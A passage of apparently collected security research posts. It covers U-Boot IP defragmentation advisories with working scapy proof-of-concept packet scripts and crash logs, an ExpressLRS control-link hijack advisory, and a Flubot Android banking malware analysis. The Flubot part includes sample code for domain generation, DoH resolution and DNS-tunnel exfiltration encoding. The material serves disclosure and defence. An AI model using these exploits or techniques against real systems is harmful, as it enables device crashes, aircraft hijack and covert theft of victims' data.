  payload = bytes(hh) + bytes(0x20)
  packet1 = Ether(dst=mac)/IP(dst=ip, flags='MF', frag=0x0, len=27)/Raw(payload)
  packet1.show2()
  sendp(packet1, iface='virbr0')
  # Trigger the unsafe write in the overlap case
  payload = bytes(0x10)
  packet2 = Ether(dst=mac)/IP(dst=ip, flags='MF', frag=0x0)/Raw(payload)
  packet2.show2()
  sendp(packet2, iface='eth0')  # iface='virbr0' if launched against a qemu instance

if __name__ == '__main__':
  global mac, ip
  mac = argv[1]
  ip = argv[2]
  frag_hole_overwrite()

The above script can be launched with the following command:

> ./fragger_poc.py dc:a6:32:ef:5f:0a 192.168.0.90

This will result in the following (log as shown on U-Boot’s console):

U-Boot 2022.04-dirty (May 26 2022 - 00:53:40 -0700)

DRAM:  7.1 GiB
RPI 4 Model B (0xd03114)
Core:  202 devices, 13 uclasses, devicetree: board
MMC:   [email protected]: 1, [email protected]: 0
Loading Environment from FAT... Unable to read "uboot.env" from mmc0:1... 
In:    serial
Out:   vidconsole
Err:   vidconsole
Net:   eth0: [email protected]
PCIe BRCM: link up, 5.0 Gbps x1 (SSC)
starting USB...
Bus xhci_pci: Register 5000420 NbrPorts 5
Starting the controller
USB XHCI 1.00
scanning bus xhci_pci for devices... 2 USB Device(s) found
       scanning usb for storage devices... 0 Storage Device(s) found
Hit any key to stop autoboot:  0 
switch to partitions #0, OK
mmc0 is current device
Scanning mmc 0:1...
Found U-Boot script /boot.scr
146 bytes read in 9 ms (15.6 KiB/s)
## Executing script at 02400000
[email protected] Waiting for PHY auto negotiation to complete. done
BOOTP broadcast 1
DHCP client bound to address 192.168.0.90 (23 ms)
*** Warning: no boot file name; using 'C0A8005A.img'
Using [email protected] device
TFTP from server 192.168.0.1; our IP address is 192.168.0.90
Filename 'C0A8005A.img'.
Load address: 0x1000000
Loading: T T T T T T T T "Synchronous Abort" handler, esr 0x8a000000
elr: fffffffff8165fff lr : 00000000000e43a8 (reloc)
elr: 000000000000ffff lr : 0000000007f8e3a8
x0 : 0000000007b9b942 x1 : 000000000000007a
x2 : 0000000000000040 x3 : 000000000000ffff
x4 : 00000000000001ad x5 : 0000000007b2f000
x6 : 0000000000000024 x7 : 0000000000000000
x8 : 000000000000000b x9 : 0000000000000008
x10: 00000000ffffffe0 x11: 0000000000000006
x12: 000000000001869f x13: 0000000007b168cc
x14: 0000000007b18b00 x15: 0000000000000002
x16: 000000000000ffff x17: 2e8324b208000000
x18: 0000000007b25d60 x19: 000000000000007a
x20: 0000000007b2f130 x21: 0000000000000020
x22: 0000000007fcf000 x23: 0000000007fc9000
x24: 0000000007fcb000 x25: 0000000007fc9000
x26: 0000000007fc9628 x27: 0000000007fcf000
x28: 0000000007fcf000 x29: 0000000007b16b40

Code: 4bcbc7cb 46890822 c96a480a b2353b57 (3e972802) 
Resetting CPU ...

resetting ...

Large buffer overflow leads to DoS in U-Boot IP Packet Defragmentation Code (CVE-2022-30552)

Project: U-Boot
Project URL: https://source.denx.de/u-boot/u-boot
Versions affected: all versions up to commit b85d130ea0cac152c21ec38ac9417b31d41b5552
Systems affected: all systems defining CONFIG_IP_DEFRAG
CVE identifier: CVE-2022-30552
Advisory URL: link
Risk: High 7.1 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
Authors: Nicolas Guigo, Nicolas Bidron

Summary

U-Boot is a popular boot loader for embedded systems, with implementations for a large number of architectures, and is prominent in most Linux-based embedded systems.

Location

u-boot/net/net.c lines 915 and 1011.

Impact

The U-Boot implementation of RFC 815 (IP Datagram Reassembly Algorithms) is susceptible to a buffer overflow through a specially crafted fragmented IP datagram with an invalid total length, which causes a denial of service.

Description

In compiled versions of U-Boot that define CONFIG_IP_DEFRAG, a value of ip->ip_len (IP packet header’s total length) lower than IP_HDR_SIZE leads to len taking a negative value, which ultimately results in a buffer overflow during the subsequent call to memcpy() that uses len as its count parameter.

This bug is only exploitable from the local network, as it requires crafting a malformed packet with an ip_len value lower than the minimum accepted total length (21, as defined in the IP specification document RFC 791), which would most likely be dropped during routing.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

The last line of the previous excerpt from u-boot/net/net.c shows where the underflow to a negative len value occurs if ip_len is set to a value strictly lower than 20 (IP_HDR_SIZE being 20). Also note that in the above excerpt the pkt_buff buffer has a size of CONFIG_NET_MAXDEFRAG, which defaults to 16 kB but can range from 1 kB to 64 kB depending on the configuration.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

In the above excerpt, the memcpy() overflows the destination by attempting to copy nearly 4 gigabytes into a buffer that is designed to hold at most CONFIG_NET_MAXDEFRAG bytes, which leads to a DoS.
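The size of that copy follows from how the negative int is reinterpreted as memcpy()'s unsigned size parameter; a small Python model of the conversion (an illustration only, with the size_t width as a parameter since it depends on the target):

```python
# Model of the signed-to-unsigned conversion behind CVE-2022-30552.
IP_HDR_SIZE = 20

def memcpy_count(ip_len, size_t_bits=32):
    """len = ip_len - IP_HDR_SIZE, then reinterpreted as an unsigned size_t."""
    length = ip_len - IP_HDR_SIZE             # negative when ip_len < 20
    return length & ((1 << size_t_bits) - 1)  # two's-complement reinterpretation

# An ip_len of 19 gives len == -1, which memcpy() sees as 0xFFFFFFFF:
# a copy of nearly 4 GiB into a buffer of at most CONFIG_NET_MAXDEFRAG bytes.
assert memcpy_count(19) == 0xFFFFFFFF
```

The PoC packet with len=19 shown below is the smallest such trigger, and it is why a single malformed fragment is enough to crash the device.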

Recommendation

This bug was fixed in commit b85d130ea0cac152c21ec38ac9417b31d41b5552 on U-Boot master’s branch. Update to the latest version to obtain the fix.

Proof of Concept for exploitation and Results

Exploitation was attempted against a build of U-Boot for Raspberry Pi 4 with IP_DEFRAG enabled. The device was set to attempt loading the kernel through U-Boot’s dhcp method; this ensures that the device gets an IP address and enables its Ethernet interface, allowing the malicious payload to be delivered by an adjacent machine on the network (connected to the same switch).

The following Python script is used to send the single malicious packet that will underflow len, ultimately overflowing the buffer (thisfrag) and crashing the device.

import ctypes
from sys import argv
from scapy.all import *

# U-Boot Fragment Underflow
def frag_underflow():
  packet = Ether(dst=mac)/IP(dst=ip, flags='MF', frag=0x0, len=19)/UDP()
  packet.show2()
  sendp(packet, iface='eth0') # iface=virbr0 if launched against a qemu instance

if __name__ == '__main__':
  global mac, ip
  mac = argv[1]
  ip = argv[2]
  frag_underflow()

The above script can be launched with the following command:

> ./fragger_poc.py dc:a6:32:ef:5f:0a 192.168.0.90

This will result in the following (log as shown on U-Boot’s console):

U-Boot 2022.04-dirty (May 26 2022 - 00:53:40 -0700)

DRAM:  7.1 GiB
RPI 4 Model B (0xd03114)
Core:  202 devices, 13 uclasses, devicetree: board
MMC:   [email protected]: 1, [email protected]: 0
Loading Environment from FAT... Unable to read "uboot.env" from mmc0:1... 
In:    serial
Out:   vidconsole
Err:   vidconsole
Net:   eth0: [email protected]
PCIe BRCM: link up, 5.0 Gbps x1 (SSC)
starting USB...
Bus xhci_pci: Register 5000420 NbrPorts 5
Starting the controller
USB XHCI 1.00
scanning bus xhci_pci for devices... 2 USB Device(s) found
       scanning usb for storage devices... 0 Storage Device(s) found
Hit any key to stop autoboot:  0 
switch to partitions #0, OK
mmc0 is current device
Scanning mmc 0:1...
Found U-Boot script /boot.scr
146 bytes read in 9 ms (15.6 KiB/s)
## Executing script at 02400000
BOOTP broadcast 1
DHCP client bound to address 192.168.0.90 (18 ms)
*** Warning: no boot file name; using 'C0A8005A.img'
Using [email protected] device
TFTP from server 192.168.0.1; our IP address is 192.168.0.90
Filename 'C0A8005A.img'.
Load address: 0x1000000
Loading: T T T T T T T T T T 
Retry count exceeded; starting again
SCRIPT FAILED: continuing...
libfdt fdt_check_header(): FDT_ERR_BADMAGIC
MMC Device 2 not found
no mmc device at slot 2

Device 0: unknown device
BOOTP broadcast 1
DHCP client bound to address 192.168.0.90 (21 ms)
*** Warning: no boot file name; using 'C0A8005A.img'
Using [email protected] device
TFTP from server 192.168.0.1; our IP address is 192.168.0.90
Filename 'C0A8005A.img'.
Load address: 0x1000000
Loading: T T T T T T T T "Synchronous Abort" handler, esr 0x96000046
elr: 00000000000e06e8 lr : 00000000000e5174 (reloc)
elr: 0000000007f8a6e8 lr : 0000000007f8f174
x0 : 0000000007fcb51c x1 : 0000000007b75964
x2 : ffffffffffffffff x3 : 0000000000234ae4
x4 : 0000000007fcb51c x5 : 0000000000000000
x6 : 0000000000000000 x7 : 00000000ffffffff
x8 : 0000000000000000 x9 : 0000000000000008
x10: 00000000ffffffe0 x11: 0000000007fcb514
x12: 000000000001869f x13: 0000000007b17d4c
x14: 0000000007b18b00 x15: 0000000000000002
x16: 0000000007f5cc84 x17: 2e8324b208000000
x18: 0000000007b25d60 x19: 0000000007b75942
x20: 0000000007fcb500 x21: 0000000007fa0fd0
x22: 0000000007f98156 x23: 00000000ffffffff
x24: 0000000007fc9000 x25: 0000000000000000
x26: 0000000007fcb514 x27: 0000000007fcb51c
x28: 0000000007b75950 x29: 0000000007b17f30

Code: cb030004 cb030021 17fffff0 38636825 (38236885) 
Resetting CPU ...

resetting ...

Disclosure Timeline

May 18th 2022: Initial e-mail from NCC to U-boot maintainers announcing two vulnerabilities were identified. U-Boot maintainers responded indicating that the disclosure process is to be handled publicly through U-Boot’s mailing list.

May 18th 2022: NCC posted a full writeup of the two vulnerabilities identified to U-Boot’s public mailing list.

May 25th 2022: a U-Boot maintainer indicated on the mailing list that they will implement a fix to the two findings.

May 26th 2022: a patch has been proposed by U-Boot maintainers to fix both CVEs through the mailing list.

May 31st 2022: U-boot maintainers and NCC Group agree to publishing the advisories in advance of patch deployment, given the public mailing-list-based discussion of the vulnerability and proposed fixes.

June 3rd 2022: Fix is committed to U-Boot master branch https://source.denx.de/u-boot/u-boot/-/commit/b85d130ea0cac152c21ec38ac9417b31d41b5552

Thanks to

Jennifer Fernick, and Dave Goldsmith for their support through the disclosure process.

U-Boot’s maintainers.

Authors

Nicolas Guigo, and Nicolas Bidron

Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control link

30 June 2022 at 18:15
 Vendor: ExpressLRS
 Vendor URL: https://expresslrs.org
 Versions affected: 1.x, 2.x
 Author: Richard Appleby
 Severity: Medium 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

ExpressLRS is a high-performance open source radio control link. It aims to provide a low-latency radio control link while also achieving maximum range. It runs on a wide variety of hardware in both the 900 MHz and 2.4 GHz frequency bands. ExpressLRS is very popular in FPV drone racing and other remote control aircraft.

Using only a standard ExpressLRS compatible transmitter, it is possible to take control of any receiver after observing traffic from a corresponding transmitter.

ExpressLRS uses a ‘binding phrase’, built into the firmware at compile time, to bind a transmitter to a receiver. ExpressLRS states that the binding phrase is not for security; it is for anti-collision.

Due to weaknesses related to the binding phrase, it is possible to extract part of the identifier shared between the receiver and transmitter. A combination of analysis and brute force can be utilised to determine the remaining portion of the identifier. Once the full identifier is discovered, it is then possible to use an attacker’s transmitter to control the craft containing the receiver with no knowledge of the binding phrase. This is possible entirely in software using standard ExpressLRS compatible hardware.

Impact

This attack could result in full control over the target craft. An aircraft already in the air would likely experience control issues causing a crash.

Details

The binding phrase is passed through the MD5 cryptographic hash algorithm to obtain a unique byte sequence. Of this sequence, the first 6 bytes are stored as a shared UID between the receiver and the transmitter. The last four bytes of the UID are used as a seed to generate a random frequency hopping spread spectrum (FHSS) sequence. Both the transmitter and receiver hop between frequencies in the FHSS sequence in sync.
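As a sketch of the derivation described above (a simplified illustration; the exact string encoding and byte layout used by the firmware are assumptions here, and the binding phrase is hypothetical):

```python
import hashlib

def derive_uid(binding_phrase: str) -> bytes:
    """Sketch: the first 6 bytes of MD5(binding phrase) form the shared UID."""
    return hashlib.md5(binding_phrase.encode("utf-8")).digest()[:6]

uid = derive_uid("example-binding-phrase")  # hypothetical phrase

fhss_seed = uid[2:6]  # last 4 UID bytes seed the FHSS sequence
crc_init = uid[4:6]   # last 2 UID bytes initialise the CRC checks
```

Note how the derived values overlap: anything that leaks the tail of the UID also leaks most of the FHSS seed, which is the crux of the weaknesses described next.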

A ‘sync’ packet is sent from the transmitter to the receiver at the start of a connection and at regular intervals throughout the FHSS sequence. CRC checks, initialised using the last two bytes of the UID, are used to ensure that packets have been received intact. 

The following diagram indicates the relationship between these elements.

Three weaknesses were identified, which allow for the discovery of the four bytes of the required UID to take control of the link.

Two of these issues relate to the contents of the sync packet.

  1. The sync packet contains the final three bytes of the UID. These bytes are used to verify that the transmitter has the same binding phrase as the receiver, to avoid collision. Observation of a single sync packet therefore gives 75% of the bytes required to take over the link. 
  2. The CRC initialiser uses the final two bytes of the UID sent with the sync packet, making it extremely easy to create a CRC check.

The combination of these two issues means that only one byte is unknown from the UID used to generate the FHSS sequence. To find the last byte, all possible byte values were used to create 256 different possible FHSS sequences. The third weakness occurs in the FHSS sequence generation.

  3. Due to weaknesses in the random number generator, the second 128 values of the final byte of the 4-byte seed produce the same FHSS sequence as the first 128. 

By choosing a frequency from the FHSS sequence, and observing the timings relative to a received sync packet, it is possible to determine which entries in the brute forced 128 FHSS sequences correlate with the final byte of the UID.

Once the final UID byte is discovered, the UID can be set in the transmitter and it will connect with the receiver.

It is acknowledged that the FHSS sequence can also be discovered by observing packets over the air without brute forcing the sequences, but this can be more time-consuming and error-prone. 
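To illustrate why only 128 candidate sequences are needed rather than 256, the sketch below uses an MSVC-style linear congruential generator; the constants, the output scaling, and the placement of the unknown byte in the top byte of the seed are all assumptions for illustration, not necessarily the exact ExpressLRS generator:

```python
def rng_sequence(seed, n=16, num_freqs=80):
    """Hypothetical MSVC-style LCG mapped onto num_freqs channels."""
    out = []
    for _ in range(n):
        seed = (seed * 214013 + 2531011) & 0xFFFFFFFF
        out.append(((seed >> 16) & 0x7FFF) % num_freqs)
    return out

# Multiplying by an odd constant lets bit 31 of the state influence only
# bit 31 and above, which wrap away mod 2**32; (>> 16) & 0x7FFF then
# discards bit 31. Flipping the seed's top bit changes nothing observable:
seed = 0x11223344
assert rng_sequence(seed) == rng_sequence(seed ^ 0x80000000)

# So brute forcing the one unknown UID byte (here assumed to occupy the
# seed's most significant byte) yields at most 128 distinct sequences:
candidates = {tuple(rng_sequence(b << 24)) for b in range(256)}
assert len(candidates) <= 128
```

This halving of the candidate space is what makes the timing-correlation step against observed sync packets practical.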

Recommendations

The security of the ExpressLRS can be improved with the following changes.

  1. Do not send the UID over the control link. The data used to generate the FHSS sequence should not be sent over the air.
  2. Improve the random number generator. This could involve using a more secure algorithm, or adjusting the existing algorithm to work around repeated sequences.

Disclosure Timeline

  • December 1, 2021: Initial contact with ExpressLRS Github repository owner
  • February 3, 2022: Technical advisory draft sent to repository owner
  • February 8, 2022: Github pull request for patch submitted to repository: https://github.com/ExpressLRS/ExpressLRS/pull/1411
  • February 9/10, 2022: Discussions regarding size of pull request and effectiveness between ExpressLRS developer and NCC Group
  • March 4, 2022: Github pull request submitted to ExpressLRS which addressed size issues
  • March 5, 2022: Pull request rejected by ExpressLRS maintainer; differing opinions between NCC and developers
  • June 30 2022: Advisory published

Flubot: the evolution of a notorious Android Banking Malware

5 July 2022 at 19:58

Originally published June 29, 2022 on the Fox-IT blog

Authored by Alberto Segura (main author) and Rolf Govers (co-author)

Summary

Flubot is an Android-based malware that has been distributed over the past 1.5 years in Europe, Asia and Oceania, affecting thousands of devices belonging mostly to unsuspecting victims. Like the majority of Android banking malware, Flubot abuses Accessibility permissions and services in order to steal the victim’s credentials: it detects when an official banking application is opened and shows a fake web injection, a phishing website similar to the login form of the banking application. An important part of Flubot’s popularity is due to the distribution strategy used in its campaigns: it has been using infected devices to send text messages, luring new victims into installing the malware from a fake website. In this article we detail its development over time and the recent developments regarding its disappearance, including new features and distribution campaigns.

Introduction

One of the most popular recently active Android banking malware families, and an “inspiration” for developers of other Android banking malware families: of course, we are talking about Flubot. Never heard of it? Let us give you a quick summary.

The Flubot banking malware family was in the wild from at least late 2020 until the first quarter of 2022. Most of its popularity comes from its distribution method: smishing. Threat actors (TAs) have been using infected devices to send text messages to other phone numbers, which are stolen from other infected devices and stored on command-and-control (C2) servers.

In the initial campaigns, TAs used fake Fedex, DHL and Correos – a local Spanish parcel shipping company – SMS messages. Those SMS messages were fake notifications which lured the user to a fake website in order to download a mobile application to track the shipment. These campaigns were very successful, since nowadays most people are used to buying all kinds of products online and to receiving such messages to track a shipment. Flubot was not only a very active family: TAs also very actively introduced new features, added support for campaigns in new countries and improved the features it already had.

On June 1, 2022, Europol announced the takedown of Flubot in a joint operation including 11 countries. The Dutch Police played a key part in this operation and successfully disrupted the infrastructure in May 2022, rendering this strain of malware inactive. That makes this an interesting moment to look back at the early days of Flubot and at how it evolved and became so notorious.

In this post we want to share all we know about this threat and a timeline of the most relevant and interesting (new) features and changes that Flubot's TAs have introduced. We will focus on these features and changes as seen in the detected samples, but also on the different campaigns that TAs have used to distribute this malware.

The beginning: A new Android Banking Malware targeting Spain [Flubot versions 0.1-3.3]

Based on reports from other researchers, Flubot samples were first found in the wild between November and December of 2020. Public information about this malware was first published on 6 January 2021 by our partner ThreatFabric (https://twitter.com/ThreatFabric/status/1346807891152560131). Even though ThreatFabric was the first to publish public information on this new family and called it “Cabassous”, the research community has been more commonly referring to this malware as Flubot.

In the initial campaigns, Flubot was distributed using Fedex and Correos fake SMS messages. In those messages, the user was led to a fake website which was basically a “landing page” style website to download what was supposed to be an Android application to track the incoming shipping.

In these initial campaigns versions prior to Flubot 3.4 were used, and TAs added support for new campaigns in other countries using a specific sample for each country. The reasons why there were different samples for different countries were:
– The Domain Generation Algorithm (DGA). It used a different seed per country to generate 5,000 different domains per month. Just out of curiosity: for Germany, TAs used 1945 as the DGA seed.
– The phone country code, used to send more distribution smishing SMS messages from infected devices and to block those numbers in order to prevent communication among victims.
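The idea behind a month-seeded DGA can be illustrated with a minimal Python sketch. Note this is an illustration of the concept only: the hashing scheme, domain length and count below are placeholders, not Flubot's actual algorithm.

```python
import hashlib

def generate_domains(seed: int, year: int, month: int, count: int = 5000, tld: str = ".com") -> list:
    """Derive `count` domains deterministically from (seed, year, month).

    Every bot configured with the same seed computes the same list for a
    given month, so the operators only need to register a handful of the
    generated domains ahead of time to keep control of the botnet.
    """
    domains = []
    for i in range(count):
        data = f"{seed}-{year}-{month}-{i}".encode()
        name = hashlib.md5(data).hexdigest()[:15]  # 15-char hostname label
        domains.append(name + tld)
    return domains

# e.g. the German-campaign seed mentioned above
german_march = generate_domains(seed=1945, year=2021, month=3, count=5)
```

Because the list is fully determined by the seed and the date, defenders who recover the algorithm and seed can pre-compute and sinkhole the same domains, which is why seed and TLD changes (as we will see later) mattered for tracking.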

There were no significant changes related to features in the initial versions (from 0.1 to 3.3). TAs were mostly focused on the distribution campaigns, trying to infect as many devices as possible.

There was one important change in the initial versions, but it is difficult to pinpoint the exact version in which it was first introduced, because for some versions there are no samples in public repositories. TAs introduced web injections to steal credentials, the most popular tactic for stealing credentials on Android devices. This was introduced somewhere between versions 0.1 and 0.5, in December 2020.

In those initial versions, TAs bumped the version number of the malware within just a few days without adding significant changes. Most of the samples – particularly those prior to 2.1 – were not uploaded to public malware repositories, making it even harder to track the first versions of Flubot.

In these initial versions (after 0.5), TAs also introduced other, less popular features, like the "USSD" feature used to call special numbers to earn money (the "RUN_USSD" command), which was introduced at some point between versions 1.2 and 1.7. In fact, it seems this feature wasn't really used by Flubot's TAs. The most-used features were the web injections to steal banking and cryptocurrency platform credentials, and the SMS-sending features used to distribute the malware and infect new devices.

From version 2.1 to 2.8 we observed that TAs started to use a different packer for the actual Flubot payload. This could explain why we weren't able to find samples in public repositories between 2.1 and 2.8: there were probably some "internal" versions used to try different packers and/or make the payload work with the new one.

March 2021: New countries and improvements on distribution campaigns [Flubot versions 3.4-3.7]

After a few months apparently focused on distribution campaigns rather than on new features for the malware itself, we found version 3.4, in which TAs introduced some changes to the DGA code. In this version, they reduced the number of generated domains from 5,000 to 2,500 a month. At first sight this looks like a minor change, but it was one of the first steps toward distributing the malware in different countries with less effort for the TAs, since at this point a different sample with different parameters was still used for each country.

In fact, we saw a new version (3.6) customized for targeting victims in Germany on March 18, 2021. Only five days later, another version was released (3.7) with interesting changes: TAs were trying to use the same sample for campaigns in Spain and Germany, including Spanish and German phone country codes, split by a newline character, to block the phone numbers to which the infected device was sending smishing messages.

At the same time, TAs introduced a new campaign in Hungary. By the end of March, TAs introduced another change in version 3.7: an important change to their DGA, replacing the ".com" TLD with ".su". This change mattered for tracking Flubot, since TAs could now use this new TLD to register new C2 domains.

April 2021: DoH and unique samples for all campaigns [Flubot versions 3.9-4.0]

It seems TAs had been working since late March on a new version: Flubot 3.9. In this new version, they introduced DNS-over-HTTPS (DoH). This new feature was used to resolve the domain names generated by the DGA. This made it more difficult to detect infected devices on the network, since security solutions were no longer able to see which domains were being resolved.

In the following images we show decompiled code of this new version, including the new DoH code. TAs kept the old classic DNS resolution code, and introduced code to randomly choose whether DoH or classic DNS should be used.
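The randomized choice between classic DNS and DoH can be sketched as follows. The resolver endpoints and the query format below are illustrative (they are the public JSON-style DoH endpoints of Google and CloudFlare); the malware's own implementation differs in its details.

```python
import random

# Public DoH endpoints of the kind the malware alternated between;
# exact endpoints and query format here are assumptions for illustration.
DOH_RESOLVERS = [
    "https://dns.google/resolve",
    "https://cloudflare-dns.com/dns-query",
]

def build_lookup(domain: str) -> str:
    """Randomly pick classic DNS or a DoH resolver for a DGA domain,
    mirroring the random DoH/classic-DNS choice described above.
    Returns the query target as a string for illustration."""
    if random.random() < 0.5:
        return f"classic-dns://{domain}"  # plain UDP/53 resolution
    resolver = random.choice(DOH_RESOLVERS)
    return f"{resolver}?name={domain}&type=A"
```

Because half the lookups travel over HTTPS to a well-known resolver, a network monitor sees only TLS traffic to Google or CloudFlare rather than suspicious DNS queries for DGA domains.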

The introduction of DoH was not the only feature added in Flubot 3.9. TAs also added some UI messages to prepare future campaigns targeting Italy. Those messages were used a few days later in the new Flubot 4.0 version, in which TAs finally started to use one single sample for all campaigns – no more unique samples to target different countries.

With this new version, the per-country parameters used in previous versions of Flubot were chosen depending on the victim's device language. For example, if the device language was Spanish, the Spanish parameters were used. The following parameters were chosen this way:
– DGA seed
– Phone country codes used for smishing and phone number blocking
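Conceptually, this per-language selection amounts to a simple lookup table. In this sketch the structure is illustrative: the German seed (1945) is the one mentioned earlier in this post, while the Spanish seed value is a hypothetical placeholder; the phone country codes are the real international prefixes.

```python
# Hypothetical configuration table keyed by device language.
# The 1945 seed for Germany is from the analysis above; the Spanish
# seed here is a made-up placeholder for illustration.
COUNTRY_PARAMS = {
    "es": {"dga_seed": 1000, "country_code": "34"},
    "de": {"dga_seed": 1945, "country_code": "49"},
}

def params_for(device_language: str) -> dict:
    """Pick DGA seed and smishing country code from the device language,
    falling back to the Spanish parameters for unsupported languages."""
    return COUNTRY_PARAMS.get(device_language, COUNTRY_PARAMS["es"])
```

A single sample shipping a table like this is exactly what removed the need for per-country builds from version 4.0 onwards.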

May 2021: Time for infrastructure and C2 server improvements [Flubot versions 4.1-4.3]

May started with a minor update to version 4.0 – a change to the DoH servers used to resolve DGA domains: instead of CloudFlare's servers they started using Google's servers. This was the first step toward a new version, Flubot 4.1.

In this new version, TAs once again changed the DoH servers used to resolve the C2 domains. This time, they introduced three different DNS services: Google, CloudFlare and AliDNS. The last of these was used for the first time in the life of Flubot to resolve the DGA domains.

Those three DoH services were chosen randomly to resolve the generated domains and finally make the requests to any of the active C2 servers.
These changes also brought a new campaign in Belgium, in which TAs used a fake BPost app and smishing messages to lure new victims. One week later, new campaigns in Turkey were also introduced, this time in a new Flubot version with important changes to its C2 protocol.

The first samples of Flubot 4.2 appeared on 17 May 2021 with a few important changes in the code used to communicate with the C2 servers. In this version, the malware sent HTTP requests to a new path on the C2: "p.php", instead of the classic "poll.php" path.

At first sight it seemed like a minor change, but paying attention to the code we realized there was an important reason behind it: TAs had changed the encryption method used in the protocol to communicate with the C2 servers.

Previous versions of Flubot used simple XOR encryption for the information exchanged with the C2 servers, but this new version 4.2 used RC4 instead of the classic XOR. This way, the C2 server supported old and new versions at the same time:

  • poll.php and poll2.php were used to send/receive requests using the old XOR encryption
  • p.php was used to send and receive requests using the new RC4 encryption

Besides the new protocol encryption in version 4.2, at the end of May TAs also added support for new campaigns in Romania.

Finally, on 28 May 2021 new samples of Flubot 4.3 were discovered with minor changes, mainly focused on the string obfuscation implemented by the malware.

June 2021: VoiceMail – new campaign, new countries [Flubot versions 4.4-4.6]

A few days after the first samples of Flubot 4.3 were discovered – on May 31 and June 1, 2021 – new Flubot samples were observed with the version number bumped to 4.4. Once more, there were no major changes in this new version; TAs added support for campaigns in Portugal. As versions 4.3 and 4.4 show, it was common for Flubot's TAs to bump the version number within just a few days, with only minor changes. Some versions were not even found in public repositories (e.g. version 3.3), which suggests that some versions were never used publicly, or were skipped while TAs simply bumped the number. Maybe those "lost versions" lasted just a few hours on the distribution servers and were quickly updated to fix bugs.

In June the TAs hardly made any feature-related changes; instead they worked on new distribution campaigns.

In version 4.5, TAs added Slovakia, the Czech Republic, Greece and Bulgaria to the list of supported countries for future campaigns. TAs reused the same DGA seed for all of them, so getting this version released didn't require much work on their part.

A few days after version 4.5 was observed, a new version 4.6 was discovered with new countries added for future campaigns: Austria and Switzerland. Also, some countries that had been removed in previous versions were reintroduced: Sweden, Poland, Hungary and the Netherlands.

This new version of Flubot didn’t come only with more country coverage. TAs introduced a new distribution campaign lure: VoiceMail. In this new “VoiceMail” campaign, infected devices were used to send text messages to new potential victims using messages in which the user was lead to a fake website. This time a “VoiceMail” app was installed, which should allow the user to listen to the received Voice mail messages. In the following image we can see the VoiceMail campaign for Spanish users.

July 2021: TAs' Holidays [Flubot version 4.7]

July 2021 was the month with the least activity. Only one version update was observed, at the very beginning of the month: Flubot 4.7. This new version no longer used different DGA seeds per country or device language; instead, TAs started to randomly choose the seed from a list of seeds – the same seeds that had previously been tied to a country or device language.

Besides the changes related to the DGA seeds, TAs also introduced support for campaigns in new countries: Serbia, Croatia and Bosnia and Herzegovina.

There was almost no Flubot activity over the summer. Our assumption is that the developers were busy with their summer holidays. As we will see in the following sections, TAs resumed their activity from August onwards.

August-September 2021: Slow come back from Holidays [Flubot versions 4.7-4.9]

During the first days of August, after TAs possibly enjoyed a nice holiday season, Australia was added to version 4.7 in order to start distribution campaigns in that country. Only a week later, TAs released the new version 4.8, in which we found some minor changes mostly related to UI messages and alert dialogs.

One more version bump for Flubot was discovered in September, when version 4.9 came out with some more minor changes, just like the previous version 4.8. This time, new web injections were introduced on the C2 servers to steal credentials from victims. Those two new versions with minor, not very relevant changes look like a relaxed comeback. From our point of view, the most interesting thing that happened in those two months is that TAs started to distribute another malware family using the Flubot botnet: we received from C2 servers a few smishing tasks in which the fake "VoiceMail" website was serving Teabot (also known as Anatsa and Toddler) instead of Flubot.

That was very interesting, because it showed that Flubot's TAs could be associated with this malware family, or at least could be interested in selling the botnet's smishing capacity to other malware developers. As we will see, that was not the only family distributed via Flubot.

October-November 2021: ‘Android Security Update’ campaign and new big protocol changes [Flubot versions 4.9]

During October and most of November, Flubot's TAs didn't bump the malware's version number, and they didn't make any significant moves during that period.

At the beginning of October, we saw a campaign different from the previous DHL / Correos / Fedex campaigns and the "VoiceMail" campaign: TAs started to distribute Flubot as a fake security update for Android. It seems this new distribution campaign didn't work as expected, since TAs went back to the "VoiceMail" campaign after a few days.

TAs were very quiet until late November, when they finally released new samples with important changes in the protocol used to communicate with the C2 servers. Having bumped version numbers so quickly at the beginning, TAs now weren't bumping the version number even for a major change like this one.

This protocol change allowed the malware to communicate with the C2 servers without opening a direct connection to them. Flubot sent TXT DNS requests to common public DNS servers (Google, CloudFlare and AliDNS), which forwarded the requests to the actual C2 servers (which implemented DNS servers) and relayed the TXT record response back to the malware. The stolen information from the infected device was encrypted using RC4 (in a very similar way to that used in the previous protocol version) and then encoded, and the encoded payload was used as a subdomain of the DGA-generated domain. The response from the C2 servers was likewise encrypted and encoded in the TXT record answering the request, and it included the commands to execute smishing tasks for the distribution campaigns or the web injections used to steal credentials.
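The outbound half of such a DNS tunnel – packing an already-encrypted payload into the subdomain labels of a DGA domain – can be sketched as below. The Base32 encoding and label layout are assumptions for illustration; Flubot's actual wire format differs, but the constraint being worked around is the same: DNS labels are limited to 63 characters and a restricted alphabet.

```python
import base64

MAX_LABEL = 63  # DNS limits each dot-separated label to 63 characters

def encode_exfil(payload: bytes, dga_domain: str) -> str:
    """Pack an (already RC4-encrypted) payload into subdomain labels of
    a DGA domain, producing the query name for a TXT lookup."""
    enc = base64.b32encode(payload).decode().rstrip("=").lower()
    labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
    return ".".join(labels + [dga_domain])

def decode_exfil(qname: str, dga_domain: str) -> bytes:
    """Server side: strip the DGA domain, rejoin the labels and decode."""
    enc = qname[: -len(dga_domain) - 1].replace(".", "").upper()
    pad = "=" * (-len(enc) % 8)  # restore Base32 padding
    return base64.b32decode(enc + pad)

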